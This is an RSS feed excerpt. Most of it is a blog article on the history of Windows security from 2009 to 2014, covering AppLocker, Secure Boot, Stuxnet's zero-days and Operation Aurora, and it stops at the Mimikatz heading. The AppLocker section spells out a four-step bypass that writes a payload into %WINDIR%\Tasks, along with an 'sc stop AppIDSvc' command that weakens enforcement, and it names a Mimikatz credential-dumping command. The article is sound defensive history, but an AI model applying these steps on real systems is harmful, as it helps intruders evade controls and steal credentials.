  { term: &quot;Trusted Execution Environment (TEE)&quot;, definition: &quot;Hardware-isolated execution context that protects confidentiality and integrity of code and data even from the host OS, hypervisor, or peripheral firmware.&quot; },
  { term: &quot;Secure Enclave Processor (SEP)&quot;, definition: &quot;Apple-designed separate processor core on the same SoC as the main application processor, with its own boot ROM, AES engine, and protected memory. Per-node hardware root of trust on every Apple PCC server.&quot; },
  { term: &quot;Reverse Map Table (RMP)&quot;, definition: &quot;Hardware-maintained table in AMD SEV-SNP recording owner and validation state for every 4 KB physical page. Defends against SEVered-style hypervisor remap attacks by construction.&quot; },
  { term: &quot;Microsoft Azure Attestation (MAA)&quot;, definition: &quot;Managed Microsoft verifier service that consumes hardware attestation evidence (SEV-SNP, TDX, SGX, vTPM) and issues a signed JWT whose claims downstream relying parties consume.&quot; },
  { term: &quot;Secure Key Release (SKR)&quot;, definition: &quot;Azure Key Vault Premium / Managed HSM capability that gates release of a wrapped key on a successful MAA JWT verification against a customer-defined release policy.&quot; },
  { term: &quot;Transparency Log (Apple PCC)&quot;, definition: &quot;Append-only public log of every production PCC node software image hash. The user&apos;s device refuses to forward a request to a node whose image hash is not in the log.&quot; },
  { term: &quot;Security Protocol and Data Model (SPDM)&quot;, definition: &quot;DMTF DSP0274 standard for mutually-authenticated PCIe-endpoint sessions, used by the NVIDIA H100 CC-On architecture to bind the host CPU TEE to the GPU.&quot; },
  { term: &quot;Oblivious HTTP (OHTTP, RFC 9458)&quot;, definition: &quot;IETF protocol for forwarding HTTP requests through a third-party relay that strips the client IP, preventing the origin or any single intermediary from linking requests to a client.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>confidential-computing</category><category>apple-private-cloud-compute</category><category>azure-confidential-computing</category><category>attestation</category><category>trusted-execution-environment</category><category>ai-privacy</category><category>h100</category><category>transparency-log</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Mimikatz and the Credential-Theft Decade: The Windows Security Wars Part 3 (2009-2014)</title><link>https://paragmali.com/blog/mimikatz-and-the-credential-theft-decade-the-windows-securit/</link><guid isPermaLink="true">https://paragmali.com/blog/mimikatz-and-the-credential-theft-decade-the-windows-securit/</guid><description>Microsoft killed the rootkit class with AppLocker, Secure Boot, ELAM, and AppContainer. Then a side project in C named Mimikatz proved the wrong layer had been hardened.</description><pubDate>Sun, 31 May 2026 00:00:00 GMT</pubDate><content:encoded>
**2009-2014 was Windows security&apos;s parallel-revolution decade.** Microsoft shipped AppLocker, Secure Boot, ELAM, AppContainer, and in-box Defender [@ms-applocker; @ms-secure-boot; @ms-elam], retiring the rootkit class and the unsigned-bootloader class. In the same window, Stuxnet burned four Windows zero-days [@symantec-stuxnet-dossier-v14] against Iranian centrifuges and Benjamin Delpy released Mimikatz, which extracted every cached credential from LSASS in one command [@mimikatz-github; @greenberg-mimikatz-wired]. The defensive playbook closed per-binary attack surface while attackers pivoted up the trust stack to the credential layer that hardened binaries still had to trust. By November 11, 2014, Microsoft had acknowledged in product (Restricted Admin RDP, LSA Protected Process, KB2871997&apos;s WDigest opt-out) [@kb2871997; @ms-lsa-protection] and in print (the Mitigating Pass-the-Hash whitepaper v1 December 2012 and v2 July 2014) [@ms-pth-v1-landing; @ms-pth-v2] that the in-VTL0 LSASS model was structurally indefensible against an admin-privileged attacker on the same host. The architectural answer -- Virtualisation-Based Security and Credential Guard in Windows 10 1507 [@ms-credential-guard] -- ships eight months outside the window and opens Part 4.
&lt;h2&gt;1. Two Continents, Eleven Months Apart&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Prerequisites.&lt;/strong&gt; This article assumes the reader has the pre-2009 Windows-security context covered by &lt;a href=&quot;https://paragmali.com/blog/two-months-without-code-the-windows-security-wars-part-1-199/&quot; rel=&quot;noopener&quot;&gt;Part 1&lt;/a&gt; and &lt;a href=&quot;https://paragmali.com/blog/eight-primitives-one-worm-the-windows-security-wars-part-2-2/&quot; rel=&quot;noopener&quot;&gt;Part 2&lt;/a&gt;, a working mental model of the Windows process / token / privilege-ring architecture (LSASS, NTLM, Kerberos AS-REQ/TGS-REQ, NTFS DACLs, EPROCESS internals, PCRs, SLAT, VTL0/VTL1), and familiarity with MS-NLMP section 3.3.2 NTLMv2 if you have not seen the construction before [@ms-nlmp-ntlmv2]. The graduate-seminar baseline is &lt;em&gt;Windows Internals&lt;/em&gt; 6e Parts 1 and 2 [@windows-internals-6e-p1; @windows-internals-6e-p2].&lt;/p&gt;
&lt;p&gt;June 17, 2010. An antivirus analyst at VirusBlokAda in Minsk named Sergey Ulasen receives a sample from an Iranian customer whose Windows boxes are rebooting on their own [@zetter-countdown-to-zero-day]. The dropper carries valid Authenticode signatures from Realtek Semiconductor and JMicron Technology [@symantec-stuxnet-dossier-v14]. The worm propagates via a previously unknown LNK shortcut bug that fires when Windows merely &lt;em&gt;displays&lt;/em&gt; the icon of a crafted file [@ms-bulletin-ms10-046]. Eleven months later, in May 2011, a French government IT engineer named Benjamin Delpy publishes a closed-source proof-of-concept called Mimikatz that pulls NT hashes and Kerberos tickets out of the LSASS process memory of every Windows box he has ever logged into and prints them to the operator&apos;s console in one command [@greenberg-mimikatz-wired; @wikipedia-mimikatz]. The conventional history puts these two events on different pages of different books. This article argues they are the two visible faces of a single structural shift.&lt;/p&gt;
&lt;p&gt;The shift is easy to state and easy to underrate. &lt;em&gt;Defensive success at one layer reliably produces attacker innovation at the next layer up.&lt;/em&gt; Microsoft spent the 2009-2014 window shipping the most ambitious per-binary hardening programme of any commercial operating system in history -- AppLocker, ASLR improvements, BitLocker To Go, UEFI Secure Boot, Measured Boot, Early Launch Antimalware, AppContainer, the WinRT sandbox, and in-box Windows Defender [@ms-applocker; @ms-secure-boot; @ms-elam; @windows-internals-6e-p1]. The programme worked. It killed the unsigned-bootloader rootkit class, the pre-antivirus-launch malware class, and the in-process Internet Explorer rendering pwnage class. None of those primitives stopped Stuxnet on a Windows 7 host with USB enabled, and none of them stopped Mimikatz on any host where an administrator opened a console.&lt;/p&gt;
&lt;p&gt;The reason is structural, not engineering. Every per-binary mitigation prevents the &lt;em&gt;wrong&lt;/em&gt; code from running. Stuxnet&apos;s win32k.sys kernel exploit and Mimikatz&apos;s &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; command did not need to be wrong code. They needed to be the &lt;em&gt;right&lt;/em&gt; code -- code an administrator chose to run, or a signed driver Microsoft itself had allowed to load -- running where the credentials lived. The credentials lived in the memory of a long-lived user-mode service called LSASS, and they lived there by design because the single sign-on contract requires the operating system to re-authenticate the user to network servers without re-prompting [@ms-credentials-processes]. The mitigation surface and the attack surface were not at the same layer.&lt;/p&gt;

timeline
    title 2009-2014 Windows Security Split Screen
    section Defender
        Oct 22 2009 : Windows 7 GA: AppLocker, ASLR improvements, BitLocker To Go
        Oct 26 2012 : Windows 8 GA: Secure Boot, ELAM, AppContainer, in-box Defender
        Oct 17 2013 : Windows 8.1: Restricted Admin RDP, LSA Protected Process
        May 13 2014 : KB2871997: WDigest opt-out, Restricted Admin back-port
        Nov 11 2014 : MS14-066 Schannel patch closes the window
    section Attacker
        Jan 12 2010 : Operation Aurora disclosed (single IE 0-day, espionage)
        Jun 17 2010 : VirusBlokAda identifies Stuxnet from an Iranian customer sample
        Dec 27 2010 : Dang and Ferrie present Stuxnet analysis at 27C3 Berlin
        May 2011 : Delpy releases Mimikatz (closed source)
        Aug 1 2013 : Duckwall and Campbell BlackHat USA Pass-the-Hash 2
        Apr 6 2014 : Mimikatz GitHub repository created
        Aug 7 2014 : Delpy and Duckwall BlackHat USA Golden Ticket reveal
&lt;p&gt;If both events were faces of the same shift, what was the shift? To see it, we have to start with what Microsoft was actually shipping.&lt;/p&gt;
&lt;h2&gt;2. The Hardening Decade: What Microsoft Was Doing 2009-2014&lt;/h2&gt;
&lt;p&gt;The popular story of 2009-2014 is that Microsoft was asleep while the Russians ate their lunch. That story is wrong. Microsoft shipped, in a single five-year window, more new platform-security primitives than the company had shipped in the previous decade combined. The problem was not the engineering. The problem was that the entire programme was orthogonal to the credential layer.&lt;/p&gt;
&lt;h3&gt;2.1 Windows 7 (October 22, 2009): per-binary control, finally&lt;/h3&gt;
&lt;p&gt;Windows 7 was the first Microsoft client operating system shipped after the &lt;a href=&quot;https://paragmali.com/blog/two-months-without-code-the-windows-security-wars-part-1-199/&quot; rel=&quot;noopener&quot;&gt;Trustworthy Computing memo&lt;/a&gt; had finished one full Secure Development Lifecycle revolution. The headline platform addition was &lt;strong&gt;AppLocker&lt;/strong&gt;, an application-control framework that let administrators allow or deny executables, scripts, MSI installers, DLLs, and packaged apps by publisher, file hash, or path [@ms-applocker]. Rules were authored in Group Policy and enforced by the Application Identity service. The rule-collection design was the first time a Microsoft Windows shipped a coherent allowlisting story rather than a bag of registry knobs.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;AppLocker&lt;/a&gt; carried two structural gaps that took years to live down. First, the DLL rule collection was off by default. Enabling it broke application compatibility on almost every real estate. Second, the Application Identity service ran as a normal Windows service, which meant an attacker who reached LocalSystem could &lt;code&gt;sc stop AppIDSvc&lt;/code&gt; and degrade enforcement open until the next reboot.This admin-stoppable-service gap is the design lesson that becomes the brief for Windows Defender Application Control&apos;s kernel-enforced policy model in Part 4 of this series. A third structural gap matters for the credential-theft era this article documents. AppLocker&apos;s publisher- and path-rule design decisions assume the file-system DACL stack enforces a clean read-allow / write-deny split for low-privileged users [@ms-applocker-design]. It does not.&lt;/p&gt;
&lt;p&gt;The well-known operator bypass on a default Windows 7 install proceeds in four steps. Step one: identify a directory whose path matches the AppLocker default &lt;code&gt;%WINDIR%\*&lt;/code&gt; allow rule for non-administrators (&lt;code&gt;%WINDIR%\Tasks&lt;/code&gt; is the canonical example because it ships with permissive ACLs to let the Task Scheduler service write child files). Step two: drop the unsigned payload binary into that directory. Step three: invoke the binary by full path. Step four: observe that AppLocker&apos;s path-rule engine consults the configured policy rather than the file&apos;s actual DACL stack and permits execution because the parent directory matches the allow-rule glob. The bypass exists because AppLocker&apos;s rule evaluation and NTFS&apos;s DACL stack live on two independent rails that disagree about which paths a non-administrator may write; the cleanup that closes this class of bypass landed in Windows Defender Application Control, which is the Part 4 story.&lt;/p&gt;
&lt;p&gt;AppLocker killed the per-binary &quot;double-click an unsigned EXE on a managed desktop&quot; attack class on every estate that deployed it, which turned out to be a strikingly small fraction of the Fortune 500.&lt;/p&gt;
&lt;p&gt;Windows 7 also tightened the in-process mitigation surface. Address Space Layout Randomisation got a new opt-in &lt;em&gt;ForceASLR&lt;/em&gt; flag callable via the loader&apos;s &lt;code&gt;MitigationOptions&lt;/code&gt; field, letting administrators force randomisation even on EXEs and DLLs that had been compiled without the &lt;code&gt;/DYNAMICBASE&lt;/code&gt; linker switch [@windows-internals-6e-p1].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BitLocker To Go for removable media&lt;/strong&gt; finally gave administrators a defensible answer to the lost-USB-stick incident report. The on-disk format is a Full Volume Encryption v2 (FVE2) volume encrypted with plain AES-CBC; unlike fixed-disk &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; on Vista and original-release Windows 7, BitLocker To Go &lt;em&gt;disables&lt;/em&gt; the Elephant Diffuser on removable drives so the small unencrypted &lt;em&gt;discovery volume&lt;/em&gt; at the start of the device can ship &lt;code&gt;BitLockerToGo.exe&lt;/code&gt;, the Windows XP / Vista &lt;em&gt;BitLocker To Go Reader&lt;/em&gt; that supports plain AES-CBC only [@ms-bitlocker-configure]. The Reader unlocks the volume with a password or a recovery key (the recovery key escrowable by Group Policy to Active Directory); smart-card and automatic-unlock protectors require native BitLocker on Windows 7 or later. The discovery-volume design is the operational concession that lets a 2009 administrator hand a BitLocker-To-Go stick to a vendor running Windows XP SP3 without giving the vendor a usable plaintext copy; the diffuser drop is the cryptographic concession that makes the Reader compatibility story possible. The threat-model concession that BitLocker To Go does not cover is the unattended-laptop / cold-boot attack class against the &lt;em&gt;primary&lt;/em&gt; disk&apos;s TPM-released VMK [@ms-bitlocker-countermeasures], which is the Evil-Maid territory Joanna Rutkowska and Alex Tereshkin demonstrated against TrueCrypt full-disk encryption in October 2009 [@rutkowska-evil-maid-2009] and which BitLocker would not fully answer until pre-boot PIN enforcement matured.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DirectAccess&lt;/strong&gt; shipped as an always-on, certificate-anchored, IPsec-over-IPv6 tunnelled successor to traditional VPNs. The architectural design used a dual-tunnel model [@ms-directaccess-design-guide]: an &lt;em&gt;infrastructure tunnel&lt;/em&gt; established at machine boot using a machine certificate, which gave the client reach-back to domain controllers, DNS, and management infrastructure &lt;em&gt;before&lt;/em&gt; any user had logged on; and an &lt;em&gt;intranet tunnel&lt;/em&gt; established at user logon using user credentials, which carried application traffic to the internal corporate network.&lt;/p&gt;
&lt;p&gt;Because DirectAccess required end-to-end IPv6 in an era when public IPv6 was a rounding error, the design layered three transition technologies in priority order: 6to4 (for clients with a public IPv4 address), Teredo (for clients behind NAT), and IP-HTTPS (a TLS-encapsulated IPv6 transport that worked across any environment that allowed outbound HTTPS, included specifically as the fallback for hotel and conference networks that blocked native IPv6 and UDP-Teredo). The always-on-before-logon property is what made DirectAccess operationally distinct from a traditional VPN: a help-desk-recoverable password reset, a Group Policy push, or a software-distribution job could reach a remote machine the instant it had Internet connectivity, with no user action required.DirectAccess was later quietly deprecated in favour of Always On VPN and Microsoft Tunnel; the architectural lesson it carries is that certificate-anchored client trust scales operationally only when the certificate lifecycle is automated end-to-end.&lt;/p&gt;
&lt;p&gt;What this killed: the per-binary &quot;unsigned EXE on a managed desktop&quot; class. What it did not touch: anything inside an LSASS-holding process tree.&lt;/p&gt;
&lt;h3&gt;2.2 Windows 8 (October 26, 2012): the boot chain and the sandbox&lt;/h3&gt;
&lt;p&gt;Windows 8 is the year the per-binary playbook reached architectural maturity. Four primitives shipped at once, and they all aim at distinct points on the trust stack.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UEFI Secure Boot&lt;/strong&gt; anchors the boot chain in firmware. The Platform Key, signed Key Exchange Keys, and the signature database &lt;code&gt;db&lt;/code&gt; together require the firmware to verify the signature of every UEFI driver, every option ROM, and the operating-system loader before transferring control [@ms-secure-boot; @ms-bulletin-ms10-046]. A revocation database &lt;code&gt;dbx&lt;/code&gt; lets Microsoft retire keys and binaries that have been compromised. Windows 8 was the first Microsoft client operating system whose Logo certification required &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; enablement by default; the chain is anchored to the UEFI 2.3.1 Errata C specification (June 2012).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Measured Boot&lt;/strong&gt; complements Secure Boot. Each stage of the boot chain extends a SHA-256 measurement into Platform Configuration Registers 0 through 7 of the Trusted Platform Module, and the TPM event log records what was measured [@windows-internals-6e-p1]. BitLocker can then bind its Volume Master Key release to a specific PCR profile, so a tampered bootloader will not yield the disk key on next boot. Secure Boot decides whether the code is allowed to run; &lt;a href=&quot;https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/&quot; rel=&quot;noopener&quot;&gt;Measured Boot&lt;/a&gt; decides whether to release secrets to the code that ran.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Early Launch Antimalware (ELAM)&lt;/strong&gt; is the first boot-start driver loaded after the kernel. ELAM gets to inspect, classify, and refuse subsequent boot-start drivers via the &lt;code&gt;BDCB_CLASSIFICATION&lt;/code&gt; enumeration, which returns Good, Bad, Unknown, or BadButCritical [@ms-elam].Microsoft&apos;s own ELAM driver, WdBoot.sys, ships with Windows Defender; third-party antivirus vendors such as McAfee, Symantec, CrowdStrike, and SentinelOne ship their own ELAM drivers post-2014. ELAM services themselves run as a Protected Process Light, which prevents lower-signer-level code from injecting into the antimalware engine. ELAM killed the rootkit-loaded-before-AV class that had defined kernel-mode malware tradecraft since the early 2000s.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;AppContainer&lt;/strong&gt; introduces the LowBox access token. Each Modern (Metro) Windows Runtime app receives a token with a per-package security identifier and a vector of capability SIDs; resource access checks intersect the capability set with the resource&apos;s discretionary access control list [@windows-internals-6e-p1]. The model is structurally similar to iOS entitlements: the kernel refuses any access the manifest did not declare. Windows 8 also ships the in-box &lt;a href=&quot;https://paragmali.com/blog/the-defenders-dilemma-microsoft-antivirus/&quot; rel=&quot;noopener&quot;&gt;Windows Defender&lt;/a&gt; (replacing the optional Microsoft Security Essentials), and Internet Explorer 10 runs Enhanced Protected Mode inside an &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt;, killing the in-process IE-rendering pwnage class that had dominated browser-borne malware for a decade.&lt;/p&gt;
&lt;p&gt;A word on branding discipline. Windows 8&apos;s sandbox is correctly named WinRT plus AppContainer plus Modern (Metro) apps. &lt;em&gt;UWP&lt;/em&gt; (Universal Windows Platform) is the Windows 10 brand introduced July 29, 2015; calling any Windows 8 deliverable UWP is a category error.&lt;/p&gt;
&lt;p&gt;What this killed: unsigned-bootloader rootkits (Secure Boot), pre-AV-launch malware (ELAM), in-process IE-rendering pwnage (AppContainer plus Enhanced Protected Mode). What it did not touch: LSASS.&lt;/p&gt;
&lt;h3&gt;2.3 Windows 8.1 and Server 2012 R2 (October 17, 2013): the first counter-pivot&lt;/h3&gt;
&lt;p&gt;Windows 8.1 is where Microsoft first lands product-level controls that &lt;em&gt;directly&lt;/em&gt; answer credential-replay tradecraft.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Restricted Admin RDP&lt;/strong&gt; changes the protocol so that the client never sends the user&apos;s plaintext password to the server&apos;s LSASS [@kb2871997]. Instead, the server issues a network challenge that the client signs with its local NT hash. The classic credential-disclosure-at-server failure mode (a foothold on the RDP server learns every administrator&apos;s plaintext password as they log in) is closed. The replay failure mode is not, but Section 6 evaluates that honestly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;LSA Protected Process&lt;/strong&gt; loads the LSASS process as a Protected Process Light with the signer level &lt;code&gt;PsProtectedSignerLsa&lt;/code&gt;. Once Protected, even a process running as NT AUTHORITY\SYSTEM cannot call &lt;code&gt;OpenProcess(PROCESS_VM_READ)&lt;/code&gt; against LSASS [@ms-lsa-protection]. The flag is enabled by setting &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; to &lt;code&gt;1&lt;/code&gt;. The architectural intuition is right; the bypass class lives in kernel mode and gets evaluated in Section 6.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Restricted Admin RDP and LSA Protected Process are the first product-level Microsoft acknowledgements that the credential layer needed its own defensive rail, distinct from the per-binary playbook. Together they foreshadow the architectural pivot that ships in Windows 10 1507 as Virtualisation-Based Security and Credential Guard [@ms-credential-guard]. The full evaluation of both controls -- what they accomplish, what they leave open, and why -- is the subject of Section 6.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Every primitive above stops the wrong code from running. The threat model is about to move on.&lt;/p&gt;
&lt;h2&gt;3. Stuxnet: The Nation-State Zero-Day Reveal&lt;/h2&gt;
&lt;h3&gt;3.1 Discovery timeline&lt;/h3&gt;
&lt;p&gt;Sergey Ulasen&apos;s June 17, 2010 sample at VirusBlokAda is the public discovery date [@zetter-countdown-to-zero-day]. The worm had been operating in the wild since at least 2009. Within weeks, Kaspersky, Symantec, and ESET independently confirmed the family. By September 2010, Ralph Langner at Langner Communications had identified the payload&apos;s specific target: Siemens Step 7 industrial-control software running on S7-300 programmable logic controllers, programmed to manipulate the rotor speeds of cascade-mounted gas centrifuges at the Natanz uranium enrichment facility in Iran [@langner-to-kill-a-centrifuge].&lt;/p&gt;
&lt;p&gt;On December 27, 2010, Bruce Dang of Microsoft&apos;s Security Response Center and Peter Ferrie co-presented &quot;Adventures in Analyzing Stuxnet&quot; at the 27th Chaos Communication Congress (27C3) in Berlin [@dang-ferrie-27c3].The venue is 27C3, not 29C3, and Dang&apos;s affiliation is Microsoft MSRC, not Symantec; the talk is the canonical engineering primary for the win32k.sys keyboard-layout kernel exploit. Their first-hand engineering walkthrough of the win32k.sys keyboard-layout exploit is the canonical record of how Stuxnet escalated privilege on Windows 2000 and XP systems (on Windows Vista and 7, Stuxnet used the Task Scheduler zero-day CVE-2010-3338 instead). In February 2011, Nicolas Falliere, Liam O Murchu, and Eric Chien of Symantec Security Response published the v1.4 W32.Stuxnet Dossier, which enumerated the four Windows zero-days, the two stolen Authenticode certificates, and the Step 7 / S7-300 payload [@symantec-stuxnet-dossier-v14]. Ralph Langner&apos;s November 2013 &quot;To Kill a Centrifuge&quot; closed the analytical loop by identifying not one but two distinct centrifuge-attacks bundled into the same worm: an earlier rotor-overpressure attack and the later rotor-speed manipulation attack [@langner-to-kill-a-centrifuge].&lt;/p&gt;
&lt;h3&gt;3.2 The four zero-days&lt;/h3&gt;
&lt;p&gt;The Symantec dossier&apos;s accounting of Stuxnet&apos;s Windows zero-days is the canonical inventory. There were four, used across the worm&apos;s propagation and escalation surfaces, &lt;strong&gt;not&lt;/strong&gt; chained in a single sequential exploit.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bulletin&lt;/th&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Role in the worm&lt;/th&gt;
&lt;th&gt;Patch date&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;MS10-046&lt;/td&gt;
&lt;td&gt;CVE-2010-2568&lt;/td&gt;
&lt;td&gt;LNK shortcut RCE; propagation via USB without autorun [@ms-bulletin-ms10-046]&lt;/td&gt;
&lt;td&gt;August 2, 2010&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MS10-061&lt;/td&gt;
&lt;td&gt;CVE-2010-2729&lt;/td&gt;
&lt;td&gt;Print Spooler RCE; network-layer propagation [@ms-bulletin-ms10-061]&lt;/td&gt;
&lt;td&gt;September 14, 2010&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MS10-073&lt;/td&gt;
&lt;td&gt;CVE-2010-2743&lt;/td&gt;
&lt;td&gt;win32k.sys keyboard-layout local privilege escalation [@ms-bulletin-ms10-073]&lt;/td&gt;
&lt;td&gt;October 12, 2010&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MS10-092&lt;/td&gt;
&lt;td&gt;CVE-2010-3338&lt;/td&gt;
&lt;td&gt;Task Scheduler local privilege escalation [@ms-bulletin-ms10-092]&lt;/td&gt;
&lt;td&gt;December 14, 2010&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The LNK bug (MS10-046) is the propagation-by-USB primitive that gave Stuxnet its air-gap-jumping reputation: merely displaying the icon of a crafted shortcut, which Windows Explorer did automatically when the user opened the USB drive, triggered code execution [@ms-bulletin-ms10-046]. The Print Spooler RCE (MS10-061) addressed a Spooler permissions-validation bug that let Stuxnet propagate over the network as a printer-share request [@ms-bulletin-ms10-061].The Print Spooler attack surface returned a decade later as CVE-2021-34527 PrintNightmare, demonstrating that a sufficiently complex local-privilege-escalation surface tends to be re-discoverable across architectural rewrites. The keyboard-layout LPE (MS10-073) was the one Dang and Ferrie walked at 27C3 -- the kernel indexed a table of function pointers when loading a keyboard layout from disk, and Stuxnet supplied a layout that pointed the index at attacker memory [@ms-bulletin-ms10-073]. The Task Scheduler LPE (MS10-092) corrected the way Task Scheduler conducted integrity checks to validate that tasks ran with their intended user privileges [@ms-bulletin-ms10-092]. Stuxnet also re-used the older MS08-067 NetAPI worm bug on unpatched hosts as a non-zero-day propagation path [@ms-bulletin-ms08-067] -- this is the Conficker bug from October 2008, not a 2010 zero-day, and any four-zero-day count that includes it is wrong.&lt;/p&gt;

flowchart LR
    subgraph Propagation
        A[&quot;LNK shortcut RCE&lt;br /&gt;MS10-046 / CVE-2010-2568&quot;]
        B[&quot;Print Spooler RCE&lt;br /&gt;MS10-061 / CVE-2010-2729&quot;]
    end
    subgraph Escalation
        C[&quot;win32k.sys keyboard-layout LPE&lt;br /&gt;MS10-073 / CVE-2010-2743&quot;]
        D[&quot;Task Scheduler LPE&lt;br /&gt;MS10-092 / CVE-2010-3338&quot;]
    end
    subgraph Payload
        E[&quot;Siemens Step 7 / S7-300 PLC&lt;br /&gt;centrifuge rotor manipulation&quot;]
    end
    A --&amp;gt; C
    A --&amp;gt; D
    B --&amp;gt; C
    B --&amp;gt; D
    C --&amp;gt; E
    D --&amp;gt; E
&lt;h3&gt;3.3 The stolen Authenticode certificates&lt;/h3&gt;
&lt;p&gt;The worm&apos;s dropper was signed by two real, valid &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode certificates&lt;/a&gt; issued to Realtek Semiconductor and JMicron Technology [@symantec-stuxnet-dossier-v14]. Both certificates were revoked within weeks of disclosure, but during the operational window of Stuxnet, every signature check Windows performed against the dropper returned a clean verdict.The Realtek and JMicron certificates were not merely stolen out of an email inbox; the corresponding hardware security modules were almost certainly accessed in person at the original equipment manufacturers&apos; facilities in the Hsinchu Science Park, Taiwan -- the long-form reconstruction in Kim Zetter&apos;s &lt;em&gt;Countdown to Zero Day&lt;/em&gt; lays out the physical-access logistics that the wire-only theft hypothesis cannot satisfy [@zetter-countdown-to-zero-day]. This prefigured the supply-chain attack class that becomes SolarWinds a decade later. This was the first publicly analyzed kinetic-effect proof that the code-signing trust root -- Authenticode and the kernel-mode driver signing PKI that depended on it -- was an adversary target rather than a structural defence.&lt;/p&gt;
&lt;h3&gt;3.4 Architectural lessons&lt;/h3&gt;
&lt;p&gt;Two structural lessons emerged from the disclosure cycle. First, USB as an attack surface acquired its own discipline. In February 2011, Microsoft re-released the autorun update covered by Microsoft Security Advisory 967940 / KB971029 as an automatic update via Windows Update, having previously offered it as an optional patch in February 2009 [@krebs-autorun-2011]. Second, IT and operational-technology (OT) cross-domain trust collapsed as a defensible perimeter -- Natanz was an air-gapped network that a USB stick crossed, and every CISO with operational-technology assets had to re-ask the question of whether a nation-state would burn a Windows zero-day to break their plant.&lt;/p&gt;
&lt;h3&gt;3.5 Did Stuxnet defeat any defender primitive Windows 7 shipped?&lt;/h3&gt;
&lt;p&gt;The narrow answer is no, the worm did not need to. Stuxnet&apos;s propagation primitives carried their own attack code -- the LNK bug ran from Explorer, the Spooler bug ran from the printer-share RPC interface -- so they did not need to defeat AppLocker (AppLocker only blocks executions a configured rule denies; an explorer.exe rendering a crafted shortcut was not a denied execution) or ASLR or DEP. The win32k.sys local privilege escalation, however, foreshadowed the Section 5 argument neatly: the per-binary mitigations Windows 7 shipped (AppLocker, ASLR, DEP, ForceASLR) did nothing for a kernel-mode bug, because kernel-mode is where those mitigations are enforced from.&lt;/p&gt;
&lt;h3&gt;3.6 Was Stuxnet really the &lt;em&gt;first&lt;/em&gt; nation-state Windows zero-day operation?&lt;/h3&gt;
&lt;p&gt;Only with two qualifiers. Operation Aurora -- the espionage campaign Google publicly disclosed on January 12, 2010 [@google-aurora-blog; @google-aurora-wayback] -- pre-dates Stuxnet&apos;s June 2010 public identification by roughly five months and used a single Windows / Internet Explorer zero-day, the IE use-after-free catalogued as CVE-2010-0249 [@nvd-cve-2010-0249], for cyber-espionage. Google&apos;s own disclosure stated that &quot;at least twenty other large companies from a wide range of businesses -- including the Internet, finance, technology, media and chemical sectors -- have been similarly targeted&quot; [@google-aurora-wayback]. The publicly named subset that emerged across the January 12-15, 2010 disclosure window included Adobe Systems (acknowledged on the Adobe corporate blog January 12, 2010) [@adobe-aurora-disclosure], Juniper Networks, Rackspace [@wikipedia-operation-aurora], plus Yahoo, Symantec, Northrop Grumman, Dow Chemical, and Morgan Stanley named in Ariana Eunjung Cha and Ellen Nakashima&apos;s Washington Post coverage on January 14, 2010 [@wapo-aurora-cha-nakashima]. Dmitri Alperovitch of McAfee Labs named the campaign &quot;Operation Aurora&quot; on January 14, 2010 based on a &lt;code&gt;\..\Aurora_Src\AuroraVNC\&lt;/code&gt; file-path string recovered from the malware binaries [@mcafee-aurora-alperovitch]. Microsoft patched the IE bug out-of-band as MS10-002 on January 21, 2010 [@ms-bulletin-ms10-002].&lt;/p&gt;

Aurora is the necessary disambiguation. The popular framing of Stuxnet as the first nation-state Windows zero-day operation is *false* without qualifiers. Aurora used one zero-day for espionage in January 2010; Stuxnet used four zero-days for kinetic effect in June 2010. The defensible framing is: *Stuxnet is the first publicly analyzed nation-state Windows operation that burned multiple zero-days for kinetic, physical effect* [@symantec-stuxnet-dossier-v14; @google-aurora-blog; @nvd-cve-2010-0249]. Both qualifiers (&quot;multi-zero-day&quot; and &quot;kinetic / physical&quot;) are load-bearing. Drop either and Aurora falsifies the framing.
&lt;p&gt;Stuxnet showed nation-states would burn four Windows zero-days for a single operation. But four zero-days is an expensive way to compromise a credential, and as it turned out, a French engineer was about to make zero-days irrelevant for the credential-theft problem.&lt;/p&gt;
&lt;h2&gt;4. Mimikatz: The Credential Layer Demolition&lt;/h2&gt;
